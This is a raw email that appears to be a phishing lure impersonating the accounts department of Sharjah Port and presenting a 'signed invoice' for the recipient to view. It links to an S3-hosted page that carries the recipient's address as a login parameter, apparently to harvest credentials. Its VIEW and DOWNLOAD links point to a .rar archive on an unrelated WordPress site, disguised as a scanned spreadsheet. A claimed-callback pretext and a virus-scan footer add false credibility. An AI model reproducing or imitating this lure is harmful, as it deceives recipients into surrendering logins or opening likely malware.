Subject: Generated Invoice and Log sheet 02/09/2024
From: "Sharjah Port Accounts" <[email-masked]>
To: <[email-masked]>
Date: Mon, 2 Sep 2024 07:52:02 +0330

<https://ardinal.s3.amazonaws.com/control_kpi.html?login=[email-masked]
om&page=_excel-fileshare&pcnt=3> 

<https://chamkourtejaratsahel.com/wp-admin/user/Generated%20Invoice%20and%
20Log%20sheet%20details.rar> Scanned_documents.xls  | 1 file (total 387.5
KB)
<https://chamkourtejaratsahel.com/wp-admin/user/Generated%20Invoice%20and%
20Log%20sheet%20details.rar> V IEW  |
<https://chamkourtejaratsahel.com/wp-admin/user/Generated%20Invoice%20and%
20Log%20sheet%20details.rar> DOWNLOAD

Dear Sir/Madam,

I tried to reach you over the phone but unable to reach you. 

As directed by your company, please find attached Signed Invoice for your
attention. 

Acknowledge receipt of mail.

For queries please contact, 

Sharjah - [email-masked] / 06-5026239 

Hamriyah - [email-masked] / 06-5264573 

Khorfakkan - [email-masked] / 09-2386281 

Timing : 7:30 AM to 3:30 PM (Monday to Thursday)

Accounts Department 
Sharjah Port

Disclaimer

The information contained in this communication from the sender is
confidential. It is intended solely for use by the recipient and others
authorized to receive it. If you are not the recipient, you are hereby
notified that any disclosure, copying, distribution or taking action in
relation of the contents of this information is strictly prohibited and
may be unlawful.

This email has been scanned for viruses and malware, and may have been
automatically archived by Mimecast, a leader in email security and cyber
resilience. Mimecast integrates email defenses with brand protection,
security awareness training, web security, compliance and other essential
capabilities. Mimecast helps protect large and small organizations from
malicious activity, human error and technology failure; and to lead the
movement toward building a more resilient world. To find out more, visit
our website.